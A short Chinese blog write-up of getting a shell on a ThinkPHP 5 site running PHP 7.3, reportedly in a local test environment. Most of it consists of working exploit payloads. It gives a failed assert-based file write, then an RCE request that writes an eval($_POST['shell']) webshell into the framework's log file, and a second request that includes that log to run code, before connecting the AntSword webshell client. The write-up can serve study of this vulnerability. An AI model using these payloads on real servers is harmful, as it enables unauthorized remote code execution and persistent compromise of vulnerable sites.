tp5+php7.3 getshell

发表于 分类于 阅读次数:

前言

以下为本地环境搭建

信息收集

报错拿到cms信息,windows+iis+tp5

web打点

thinkphp RCE漏洞还是挺多的,直接上tp检测神器

能执行phpinfo确实存在RCE,拿到真实路径,得到php为7.3

直接使用工具写shell失败

exp写shell失败,php7.1以上无法使用assert

1
s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

getshell

google了一下,找到日志写shell方法

将shell写入日志

1
2
/index.php?s=captcha
_method=__construct&method=get&filter[]=call_user_func&server[]=-1&get[]=<?php eval($_POST['shell']); ?>

包含日志文件getshell,成功执行phpinfo

1
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202207/21.log&shell=phpinfo();

上蚁剑